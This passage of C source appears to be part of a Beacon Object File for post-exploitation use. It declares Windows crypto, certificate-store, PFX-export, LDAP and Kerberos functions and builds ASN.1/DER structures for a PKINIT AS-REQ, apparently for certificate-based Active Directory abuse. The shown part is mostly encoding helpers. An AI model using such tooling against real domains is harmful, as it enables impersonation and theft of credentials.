0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x37, 0xED, 0x6B,
0x0B, 0xFF, 0x5C, 0xB6, 0xF4, 0x06, 0xB7, 0xED,
0xEE, 0x38, 0x6B, 0xFB, 0x5A, 0x89, 0x9F, 0xA5,
0xAE, 0x9F, 0x24, 0x11, 0x7C, 0x4B, 0x1F, 0xE6,
0x49, 0x28, 0x66, 0x51, 0xEC, 0xE6, 0x53, 0x81,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF
};
static const BYTE DH_G_MODP2[] = { 0x02 };
#define szOID_NT_PRINCIPAL_NAME "1.3.6.1.4.1.311.20.2.3"
/* PKINIT OIDs - RFC 4556 */
#define szOID_PKINIT_AUTHDATA "1.3.6.1.5.2.3.1" /* id-pkinit-authData */
#define szOID_PKINIT_DHKEYSDATA "1.3.6.1.5.2.3.2" /* id-pkinit-DHKeyData */
/* Global state for PKINIT */
static BYTE g_dhPrivateKey[128];
static BYTE g_dhPublicKey[128];
static BYTE g_sessionKey[32];
static BYTE g_replyKey[32];
static int g_nonce;
/*
* =============================================================================
* Function Declarations for DFR
* =============================================================================
*/
#ifdef BOF
/* Winsock */
DECLSPEC_IMPORT int WSAAPI WS2_32$WSAStartup(WORD, LPWSADATA);
DECLSPEC_IMPORT int WSAAPI WS2_32$WSACleanup(void);
DECLSPEC_IMPORT SOCKET WSAAPI WS2_32$socket(int, int, int);
DECLSPEC_IMPORT int WSAAPI WS2_32$connect(SOCKET, const struct sockaddr*, int);
DECLSPEC_IMPORT int WSAAPI WS2_32$send(SOCKET, const char*, int, int);
DECLSPEC_IMPORT int WSAAPI WS2_32$recv(SOCKET, char*, int, int);
DECLSPEC_IMPORT int WSAAPI WS2_32$closesocket(SOCKET);
DECLSPEC_IMPORT struct hostent* WSAAPI WS2_32$gethostbyname(const char*);
DECLSPEC_IMPORT unsigned long WSAAPI WS2_32$inet_addr(const char*);
DECLSPEC_IMPORT unsigned short WSAAPI WS2_32$htons(unsigned short);
DECLSPEC_IMPORT unsigned long WSAAPI WS2_32$htonl(unsigned long);
DECLSPEC_IMPORT unsigned long WSAAPI WS2_32$ntohl(unsigned long);
/* Crypto - ADVAPI32 */
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptAcquireContextW(HCRYPTPROV*, LPCWSTR, LPCWSTR, DWORD, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptReleaseContext(HCRYPTPROV, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGenKey(HCRYPTPROV, ALG_ID, DWORD, HCRYPTKEY*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDestroyKey(HCRYPTKEY);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGenRandom(HCRYPTPROV, DWORD, BYTE*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptCreateHash(HCRYPTPROV, ALG_ID, HCRYPTKEY, DWORD, HCRYPTHASH*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptHashData(HCRYPTHASH, const BYTE*, DWORD, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptGetHashParam(HCRYPTHASH, DWORD, BYTE*, DWORD*, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDestroyHash(HCRYPTHASH);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptExportKey(HCRYPTKEY, HCRYPTKEY, DWORD, DWORD, BYTE*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptImportKey(HCRYPTPROV, const BYTE*, DWORD, HCRYPTKEY, DWORD, HCRYPTKEY*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptSetKeyParam(HCRYPTKEY, DWORD, const BYTE*, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptDecrypt(HCRYPTKEY, HCRYPTHASH, BOOL, DWORD, BYTE*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CryptSignHashW(HCRYPTHASH, DWORD, LPCWSTR, DWORD, BYTE*, DWORD*);
/* Crypto - CRYPT32 */
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptEncodeObjectEx(DWORD, LPCSTR, const void*, DWORD, PCRYPT_ENCODE_PARA, void*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptDecodeObjectEx(DWORD, LPCSTR, const BYTE*, DWORD, DWORD, PCRYPT_DECODE_PARA, void*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptBinaryToStringA(const BYTE*, DWORD, DWORD, LPSTR, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptStringToBinaryA(LPCSTR, DWORD, DWORD, BYTE*, DWORD*, DWORD*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertStrToNameA(DWORD, LPCSTR, DWORD, void*, BYTE*, DWORD*, LPCSTR*);
DECLSPEC_IMPORT PCCERT_CONTEXT WINAPI CRYPT32$CertCreateCertificateContext(DWORD, const BYTE*, DWORD);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertFreeCertificateContext(PCCERT_CONTEXT);
DECLSPEC_IMPORT HCERTSTORE WINAPI CRYPT32$CertOpenStore(LPCSTR, DWORD, HCRYPTPROV_LEGACY, DWORD, const void*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertCloseStore(HCERTSTORE, DWORD);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertAddCertificateContextToStore(HCERTSTORE, PCCERT_CONTEXT, DWORD, PCCERT_CONTEXT*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CertSetCertificateContextProperty(PCCERT_CONTEXT, DWORD, DWORD, const void*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$PFXExportCertStoreEx(HCERTSTORE, CRYPT_DATA_BLOB*, LPCWSTR, void*, DWORD);
DECLSPEC_IMPORT HCERTSTORE WINAPI CRYPT32$PFXImportCertStore(CRYPT_DATA_BLOB*, LPCWSTR, DWORD);
DECLSPEC_IMPORT PCCERT_CONTEXT WINAPI CRYPT32$CertEnumCertificatesInStore(HCERTSTORE, PCCERT_CONTEXT);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptAcquireCertificatePrivateKey(PCCERT_CONTEXT, DWORD, void*, HCRYPTPROV_OR_NCRYPT_KEY_HANDLE*, DWORD*, BOOL*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptSignMessage(PCRYPT_SIGN_MESSAGE_PARA, BOOL, DWORD, const BYTE*[], DWORD[], BYTE*, DWORD*);
DECLSPEC_IMPORT HCRYPTMSG WINAPI CRYPT32$CryptMsgOpenToEncode(DWORD, DWORD, DWORD, const void*, LPSTR, PCMSG_STREAM_INFO);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptMsgUpdate(HCRYPTMSG, const BYTE*, DWORD, BOOL);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptMsgGetParam(HCRYPTMSG, DWORD, DWORD, void*, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptMsgClose(HCRYPTMSG);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptExportPublicKeyInfo(HCRYPTPROV, DWORD, DWORD, PCERT_PUBLIC_KEY_INFO, DWORD*);
DECLSPEC_IMPORT BOOL WINAPI CRYPT32$CryptSignAndEncodeCertificate(HCRYPTPROV_OR_NCRYPT_KEY_HANDLE, DWORD, DWORD, LPCSTR, const void*, PCRYPT_ALGORITHM_IDENTIFIER, const void*, BYTE*, DWORD*);
/* COM */
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD);
DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID, LPUNKNOWN, DWORD, REFIID, LPVOID*);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateGuid(GUID*);
DECLSPEC_IMPORT BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR*);
DECLSPEC_IMPORT void WINAPI OLEAUT32$SysFreeString(BSTR);
/* NetAPI */
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameW(LPCWSTR, LPCWSTR, GUID*, LPCWSTR, ULONG, PDOMAIN_CONTROLLER_INFOW*);
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID);
/* Kernel32 */
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc(UINT, SIZE_T);
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$FreeLibrary(HMODULE);
DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT, DWORD, LPCCH, int, LPWSTR, int);
DECLSPEC_IMPORT int WINAPI KERNEL32$WideCharToMultiByte(UINT, DWORD, LPCWCH, int, LPSTR, int, LPCCH, LPBOOL);
DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemTime(LPSYSTEMTIME);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileW(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadFile(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileSize(HANDLE, LPDWORD);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(void);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetComputerNameExW(int, LPWSTR, LPDWORD);
/* MSVCRT */
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t);
DECLSPEC_IMPORT void __cdecl MSVCRT$free(void*);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void*, int, size_t);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(void*, const void*, size_t);
DECLSPEC_IMPORT int __cdecl MSVCRT$memcmp(const void*, const void*, size_t);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char*);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(const wchar_t*);
DECLSPEC_IMPORT int __cdecl MSVCRT$sprintf(char*, const char*, ...);
DECLSPEC_IMPORT int __cdecl MSVCRT$swprintf(wchar_t*, const wchar_t*, ...);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcpy(char*, const char*);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcat(char*, const char*);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strchr(const char*, int);
DECLSPEC_IMPORT wchar_t* __cdecl MSVCRT$wcscpy(wchar_t*, const wchar_t*);
DECLSPEC_IMPORT int __cdecl MSVCRT$_stricmp(const char*, const char*);
DECLSPEC_IMPORT int __cdecl MSVCRT$rand(void);
DECLSPEC_IMPORT void __cdecl MSVCRT$srand(unsigned int);
DECLSPEC_IMPORT time_t __cdecl MSVCRT$time(time_t*);
/* DFR macros */
#define WSAStartup WS2_32$WSAStartup
#define WSACleanup WS2_32$WSACleanup
#define socket WS2_32$socket
#define connect WS2_32$connect
#define send WS2_32$send
#define recv WS2_32$recv
#define closesocket WS2_32$closesocket
#define gethostbyname WS2_32$gethostbyname
#define inet_addr WS2_32$inet_addr
#define htons WS2_32$htons
#define htonl WS2_32$htonl
#define ntohl WS2_32$ntohl
#define CryptAcquireContextW ADVAPI32$CryptAcquireContextW
#define CryptReleaseContext ADVAPI32$CryptReleaseContext
#define CryptGenKey ADVAPI32$CryptGenKey
#define CryptDestroyKey ADVAPI32$CryptDestroyKey
#define CryptGenRandom ADVAPI32$CryptGenRandom
#define CryptCreateHash ADVAPI32$CryptCreateHash
#define CryptHashData ADVAPI32$CryptHashData
#define CryptGetHashParam ADVAPI32$CryptGetHashParam
#define CryptDestroyHash ADVAPI32$CryptDestroyHash
#define CryptExportKey ADVAPI32$CryptExportKey
#define CryptImportKey ADVAPI32$CryptImportKey
#define CryptSetKeyParam ADVAPI32$CryptSetKeyParam
#define CryptDecrypt ADVAPI32$CryptDecrypt
#define CryptSignHashW ADVAPI32$CryptSignHashW
#define CryptEncodeObjectEx CRYPT32$CryptEncodeObjectEx
#define CryptDecodeObjectEx CRYPT32$CryptDecodeObjectEx
#define CryptBinaryToStringA CRYPT32$CryptBinaryToStringA
#define CryptStringToBinaryA CRYPT32$CryptStringToBinaryA
#define CertStrToNameA CRYPT32$CertStrToNameA
#define CertCreateCertificateContext CRYPT32$CertCreateCertificateContext
#define CertFreeCertificateContext CRYPT32$CertFreeCertificateContext
#define CertOpenStore CRYPT32$CertOpenStore
#define CertCloseStore CRYPT32$CertCloseStore
#define CertAddCertificateContextToStore CRYPT32$CertAddCertificateContextToStore
#define CertSetCertificateContextProperty CRYPT32$CertSetCertificateContextProperty
#define PFXExportCertStoreEx CRYPT32$PFXExportCertStoreEx
#define PFXImportCertStore CRYPT32$PFXImportCertStore
#define CertEnumCertificatesInStore CRYPT32$CertEnumCertificatesInStore
#define CryptAcquireCertificatePrivateKey CRYPT32$CryptAcquireCertificatePrivateKey
#define CryptSignMessage CRYPT32$CryptSignMessage
#define CryptExportPublicKeyInfo CRYPT32$CryptExportPublicKeyInfo
#define CryptSignAndEncodeCertificate CRYPT32$CryptSignAndEncodeCertificate
#define CryptMsgOpenToEncode CRYPT32$CryptMsgOpenToEncode
#define CryptMsgUpdate CRYPT32$CryptMsgUpdate
#define CryptMsgGetParam CRYPT32$CryptMsgGetParam
#define CryptMsgClose CRYPT32$CryptMsgClose
#define CoInitializeEx OLE32$CoInitializeEx
#define CoUninitialize OLE32$CoUninitialize
#define CoCreateInstance OLE32$CoCreateInstance
#define CoCreateGuid OLE32$CoCreateGuid
#define SysAllocString OLEAUT32$SysAllocString
#define SysFreeString OLEAUT32$SysFreeString
#define DsGetDcNameW NETAPI32$DsGetDcNameW
#define NetApiBufferFree NETAPI32$NetApiBufferFree
#define LocalAlloc KERNEL32$LocalAlloc
#define LocalFree KERNEL32$LocalFree
#define LoadLibraryA KERNEL32$LoadLibraryA
#define GetProcAddress KERNEL32$GetProcAddress
#define FreeLibrary KERNEL32$FreeLibrary
#define MultiByteToWideChar KERNEL32$MultiByteToWideChar
#define WideCharToMultiByte KERNEL32$WideCharToMultiByte
#define GetSystemTime KERNEL32$GetSystemTime
#define WriteFile KERNEL32$WriteFile
#define CreateFileW KERNEL32$CreateFileW
#define CloseHandle KERNEL32$CloseHandle
#define ReadFile KERNEL32$ReadFile
#define GetFileSize KERNEL32$GetFileSize
#define GetLastError KERNEL32$GetLastError
#define GetComputerNameExW KERNEL32$GetComputerNameExW
#define malloc MSVCRT$malloc
#define free MSVCRT$free
#define memset MSVCRT$memset
#define memcpy MSVCRT$memcpy
#define memcmp MSVCRT$memcmp
#define strlen MSVCRT$strlen
#define wcslen MSVCRT$wcslen
#define sprintf MSVCRT$sprintf
#define swprintf MSVCRT$swprintf
#define strcpy MSVCRT$strcpy
#define strcat MSVCRT$strcat
#define strchr MSVCRT$strchr
#define wcscpy MSVCRT$wcscpy
#define _stricmp MSVCRT$_stricmp
#define rand MSVCRT$rand
#define srand MSVCRT$srand
#define time MSVCRT$time
/*
* =============================================================================
* LDAP DFR - SID Lookup Support for KB5014754 Strong Certificate Mapping
* =============================================================================
*/
/* LDAP DFR declarations */
DECLSPEC_IMPORT LDAP* WINAPI WLDAP32$ldap_initW(PWSTR, ULONG);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_bind_sW(LDAP*, PWSTR, PWSTR, ULONG);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_search_sW(LDAP*, PWSTR, ULONG, PWSTR, PWSTR*, ULONG, LDAPMessage**);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_unbind(LDAP*);
DECLSPEC_IMPORT LDAPMessage* WINAPI WLDAP32$ldap_first_entry(LDAP*, LDAPMessage*);
DECLSPEC_IMPORT struct berval** WINAPI WLDAP32$ldap_get_values_lenW(LDAP*, LDAPMessage*, PWSTR);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_value_free_len(struct berval**);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_msgfree(LDAPMessage*);
DECLSPEC_IMPORT ULONG WINAPI WLDAP32$ldap_set_optionW(LDAP*, int, const void*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertSidToStringSidA(PSID, LPSTR*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$IsValidSid(PSID);
DECLSPEC_IMPORT DWORD WINAPI ADVAPI32$GetLengthSid(PSID);
#define ldap_initW WLDAP32$ldap_initW
#define ldap_bind_sW WLDAP32$ldap_bind_sW
#define ldap_search_sW WLDAP32$ldap_search_sW
#define ldap_unbind WLDAP32$ldap_unbind
#define ldap_first_entry WLDAP32$ldap_first_entry
#define ldap_get_values_lenW WLDAP32$ldap_get_values_lenW
#define ldap_value_free_len WLDAP32$ldap_value_free_len
#define ldap_msgfree WLDAP32$ldap_msgfree
#define ldap_set_optionW WLDAP32$ldap_set_optionW
#define ConvertSidToStringSidA ADVAPI32$ConvertSidToStringSidA
#define IsValidSid ADVAPI32$IsValidSid
#define GetLengthSid ADVAPI32$GetLengthSid
#endif /* BOF */
/*
* =============================================================================
* cryptdll.dll types for Kerberos decryption
* =============================================================================
*/
/* CDLocateCSystem function pointer type */
typedef int (WINAPI *CDLocateCSystem_t)(int, void**);
typedef int (WINAPI *CDLocateCheckSum_t)(int, void**);
/*
* =============================================================================
* KERB_ECRYPT Structure for cryptdll.dll
* =============================================================================
*/
typedef struct _KERB_ECRYPT {
int Type0;
int BlockSize;
int Type1;
int KeySize;
int Size;
int Type2;
int Type3;
void* AlgName;
void* Initialize;
void* Encrypt;
void* Decrypt;
void* Finish;
void* HashPassword;
void* RandomKey;
void* Control;
} KERB_ECRYPT;
typedef int (WINAPI *KERB_ECRYPT_Initialize)(BYTE* key, int keySize, int keyUsage, void** pContext);
typedef int (WINAPI *KERB_ECRYPT_Decrypt)(void* pContext, BYTE* data, int dataSize, BYTE* output, int* outputSize);
typedef int (WINAPI *KERB_ECRYPT_Finish)(void** pContext);
/*
* =============================================================================
* ASN.1/DER Encoding Functions
* =============================================================================
*/
/* Encode length in DER format */
static int EncodeLength(BYTE* buf, int len) {
if (len < 128) {
buf[0] = (BYTE)len;
return 1;
} else if (len < 256) {
buf[0] = 0x81;
buf[1] = (BYTE)len;
return 2;
} else if (len < 65536) {
buf[0] = 0x82;
buf[1] = (BYTE)(len >> 8);
buf[2] = (BYTE)(len & 0xFF);
return 3;
} else {
buf[0] = 0x83;
buf[1] = (BYTE)(len >> 16);
buf[2] = (BYTE)((len >> 8) & 0xFF);
buf[3] = (BYTE)(len & 0xFF);
return 4;
}
}
/* Decode DER length */
static int DecodeLength(BYTE* data, int offset, int* length) {
if ((data[offset] & 0x80) == 0) {
*length = data[offset];
return 1;
} else {
int numBytes = data[offset] & 0x7F;
*length = 0;
for (int i = 1; i <= numBytes; i++) {
*length = (*length << 8) | data[offset + i];
}
return 1 + numBytes;
}
}
/* Build DER SEQUENCE */
static BYTE* BuildSequence(BYTE* content, int contentLen, int* outLen) {
int lenSize;
BYTE lenBuf[4];
BYTE* result;
lenSize = EncodeLength(lenBuf, contentLen);
*outLen = 1 + lenSize + contentLen;
result = (BYTE*)malloc(*outLen);
result[0] = 0x30; /* SEQUENCE */
memcpy(result + 1, lenBuf, lenSize);
memcpy(result + 1 + lenSize, content, contentLen);
return result;
}
/* Build DER INTEGER from int */
static BYTE* BuildInteger(int value, int* outLen) {
BYTE* result;
if (value >= 0 && value < 128) {
*outLen = 3;
result = (BYTE*)malloc(3);
result[0] = 0x02;
result[1] = 0x01;
result[2] = (BYTE)value;
} else if (value >= 0 && value < 256) {
*outLen = 4;
result = (BYTE*)malloc(4);
result[0] = 0x02;
result[1] = 0x02;
result[2] = 0x00;
result[3] = (BYTE)value;
} else {
*outLen = 6;
result = (BYTE*)malloc(6);
result[0] = 0x02;
result[1] = 0x04;
result[2] = (BYTE)(value >> 24);
result[3] = (BYTE)(value >> 16);
result[4] = (BYTE)(value >> 8);
result[5] = (BYTE)value;
}
return result;
}
/* Build DER INTEGER from bytes */
static BYTE* BuildIntegerFromBytes(BYTE* data, int dataLen, int* outLen) {
BYTE* result;
int lenSize;
BYTE lenBuf[4];
int needPadding = (data[0] & 0x80) ? 1 : 0;
int totalDataLen = dataLen + needPadding;
lenSize = EncodeLength(lenBuf, totalDataLen);
*outLen = 1 + lenSize + totalDataLen;
result = (BYTE*)malloc(*outLen);
result[0] = 0x02; /* INTEGER */
memcpy(result + 1, lenBuf, lenSize);
if (needPadding) {
result[1 + lenSize] = 0x00;
memcpy(result + 2 + lenSize, data, dataLen);
} else {
memcpy(result + 1 + lenSize, data, dataLen);
}
return result;
}
/* Build DER OCTET STRING */
static BYTE* BuildOctetString(BYTE* data, int dataLen, int* outLen) {
BYTE* result;
int lenSize;
BYTE lenBuf[4];
lenSize = EncodeLength(lenBuf, dataLen);
*outLen = 1 + lenSize + dataLen;
result = (BYTE*)malloc(*outLen);
result[0] = 0x04; /* OCTET STRING */
memcpy(result + 1, lenBuf, lenSize);
memcpy(result + 1 + lenSize, data, dataLen);
return result;
}
/* Build DER BIT STRING */
static BYTE* BuildBitString(BYTE* data, int dataLen, int* outLen) {
BYTE* result;
int lenSize;
BYTE lenBuf[4];
lenSize = EncodeLength(lenBuf, dataLen + 1);
*outLen = 1 + lenSize + 1 + dataLen;
result = (BYTE*)malloc(*outLen);
result[0] = 0x03; /* BIT STRING */
memcpy(result + 1, lenBuf, lenSize);
result[1 + lenSize] = 0x00; /* unused bits */
memcpy(result + 2 + lenSize, data, dataLen);
return result;
}
/* Build Context Tag [n] */
static BYTE* BuildContextTag(int tagNum, BYTE* content, int contentLen, int* outLen) {
BYTE* result;
int lenSize;
BYTE lenBuf[4];
lenSize = EncodeLength(lenBuf, contentLen);
*outLen = 1 + lenSize + contentLen;
result = (BYTE*)malloc(*outLen);
result[0] = 0xA0 | tagNum; /* Context tag */
memcpy(result + 1, lenBuf, lenSize);
memcpy(result + 1 + lenSize, content, contentLen);
return result;
}
/* Build APPLICATION tag */
static BYTE* BuildApplication(int appNum, BYTE* content, int contentLen, int* outLen) {
BYTE* result;
int lenSize;
BYTE lenBuf[4];
lenSize = EncodeLength(lenBuf, contentLen);
*outLen = 1 + lenSize + contentLen;
result = (BYTE*)malloc(*outLen);
result[0] = 0x60 | appNum; /* APPLICATION constructed */
memcpy(result + 1, lenBuf, lenSize);
memcpy(result + 1 + lenSize, content, contentLen);
return result;
}
/* Build GeneralString */
static BYTE* BuildGeneralString(const char* str, int* outLen) {
int strLen = (int)strlen(str);
int lenSize;
BYTE lenBuf[4];
BYTE* result;
lenSize = EncodeLength(lenBuf, strLen);
*outLen = 1 + lenSize + strLen;
result = (BYTE*)malloc(*outLen);
result[0] = 0x1B; /* GeneralString */
memcpy(result + 1, lenBuf, lenSize);
memcpy(result + 1 + lenSize, str, strLen);
return result;
}
/* Build GeneralizedTime */
static BYTE* BuildGeneralizedTime(const char* timeStr, int* outLen) {
int strLen = (int)strlen(timeStr);
BYTE* result;
*outLen = 2 + strLen;
result = (BYTE*)malloc(*outLen);
result[0] = 0x18; /* GeneralizedTime */
result[1] = (BYTE)strLen;
memcpy(result + 2, timeStr, strLen);
return result;
}
/* Combine multiple byte arrays */
static BYTE* CombineBytes(BYTE** arrays, int* lengths, int count, int* outLen) {
int totalLen = 0;
for (int i = 0; i < count; i++) {
totalLen += lengths[i];
}
BYTE* result = (BYTE*)malloc(totalLen);
int offset = 0;
for (int i = 0; i < count; i++) {
memcpy(result + offset, arrays[i], lengths[i]);
offset += lengths[i];
}
*outLen = totalLen;
return result;
}
/*
* =============================================================================
* PKINIT - Build KDC-REQ-BODY
* =============================================================================
*/
/* Build PrincipalName structure */
static BYTE* BuildPrincipalName(int nameType, const char* name1, const char* name2, int* outLen) {
int offset = 0;
BYTE* content = (BYTE*)malloc(1024);
BYTE* nameStrings = (BYTE*)malloc(512);
int nameStringsLen = 0;
/* name-type [0] INTEGER */
int nameTypeLen;
BYTE* nameTypeInt = BuildInteger(nameType, &nameTypeLen);
int nameTypeTagLen;
BYTE* nameTypeTag = BuildContextTag(0, nameTypeInt, nameTypeLen, &nameTypeTagLen);
memcpy(content + offset, nameTypeTag, nameTypeTagLen);
offset += nameTypeTagLen;
free(nameTypeInt);
free(nameTypeTag);
/* name-string [1] SEQUENCE OF GeneralString */
int str1Len;
BYTE* str1 = BuildGeneralString(name1, &str1Len);
memcpy(nameStrings + nameStringsLen, str1, str1Len);
nameStringsLen += str1Len;
free(str1);
if (name2 != NULL) {
int str2Len;
BYTE* str2 = BuildGeneralString(name2, &str2Len);
memcpy(nameStrings + nameStringsLen, str2, str2Len);
nameStringsLen += str2Len;
free(str2);
}
int nameStrSeqLen;
BYTE* nameStrSeq = BuildSequence(nameStrings, nameStringsLen, &nameStrSeqLen);
int nameStrTagLen;
BYTE* nameStrTag = BuildContextTag(1, nameStrSeq, nameStrSeqLen, &nameStrTagLen);
memcpy(content + offset, nameStrTag, nameStrTagLen);
offset += nameStrTagLen;
free(nameStrSeq);
free(nameStrTag);
free(nameStrings);
BYTE* result = BuildSequence(content, offset, outLen);
free(content);
return result;
}
/* Build KDC-REQ-BODY for AS-REQ */
static BYTE* BuildKdcReqBody(const char* user, const char* realm, int* outLen) {
BYTE* content = (BYTE*)malloc(4096);
int offset = 0;
/* kdc-options [0] BIT STRING */
/* Flags: forwardable (0x40), renewable (0x80), canonicalize (0x10), renewable-ok (0x10) */
BYTE kdcOptions[] = { 0x03, 0x05, 0x00, 0x40, 0x81, 0x00, 0x10 };
int kdcOptsTagLen;
BYTE* kdcOptsTag = BuildContextTag(0, kdcOptions, sizeof(kdcOptions), &kdcOptsTagLen);
memcpy(content + offset, kdcOptsTag, kdcOptsTagLen);
offset += kdcOptsTagLen;
free(kdcOptsTag);
/* cname [1] PrincipalName (NT-PRINCIPAL = 1) */
int cnameLen;
BYTE* cname = BuildPrincipalName(1, user, NULL, &cnameLen);
int cnameTagLen;
BYTE* cnameTag = BuildContextTag(1, cname, cnameLen, &cnameTagLen);
memcpy(content + offset, cnameTag, cnameTagLen);
offset += cnameTagLen;
free(cname);
free(cnameTag);
/* realm [2] GeneralString */
int realmStrLen;
BYTE* realmStr = BuildGeneralString(realm, &realmStrLen);
int realmTagLen;
BYTE* realmTag = BuildContextTag(2, realmStr, realmStrLen, &realmTagLen);
memcpy(content + offset, realmTag, realmTagLen);
offset += realmTagLen;
free(realmStr);
free(realmTag);
/* sname [3] PrincipalName (NT-SRV-INST = 2, krbtgt/REALM) */
int snameLen;
BYTE* sname = BuildPrincipalName(2, "krbtgt", realm, &snameLen);
int snameTagLen;
BYTE* snameTag = BuildContextTag(3, sname, snameLen, &snameTagLen);
memcpy(content + offset, snameTag, snameTagLen);
offset += snameTagLen;
free(sname);
free(snameTag);
/* till [5] KerberosTime (1 year from now) */
SYSTEMTIME st;
GetSystemTime(&st);
char tillTime[20];
sprintf(tillTime, "%04d%02d%02d%02d%02d%02dZ",
st.wYear + 1, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);
int tillStrLen;
BYTE* tillStr = BuildGeneralizedTime(tillTime, &tillStrLen);
int tillTagLen;
BYTE* tillTag = BuildContextTag(5, tillStr, tillStrLen, &tillTagLen);
memcpy(content + offset, tillTag, tillTagLen);
offset += tillTagLen;
free(tillStr);
free(tillTag);
/* nonce [7] INTEGER */
srand((unsigned int)time(NULL));
g_nonce = 100000000 + (rand() % 899999999);
int nonceLen;
BYTE* nonceInt = BuildInteger(g_nonce, &nonceLen);
int nonceTagLen;
BYTE* nonceTag = BuildContextTag(7, nonceInt, nonceLen, &nonceTagLen);
memcpy(content + offset, nonceTag, nonceTagLen);
offset += nonceTagLen;
free(nonceInt);
free(nonceTag);
/* etype [8] SEQUENCE OF INTEGER */
BYTE etypesContent[32];
int etypesContentLen = 0;
int etypeLen;
BYTE* etype1 = BuildInteger(ETYPE_AES256_CTS_HMAC_SHA1, &etypeLen);
memcpy(etypesContent + etypesContentLen, etype1, etypeLen);
etypesContentLen += etypeLen;
free(etype1);
BYTE* etype2 = BuildInteger(ETYPE_AES128_CTS_HMAC_SHA1, &etypeLen);
memcpy(etypesContent + etypesContentLen, etype2, etypeLen);
etypesContentLen += etypeLen;
free(etype2);
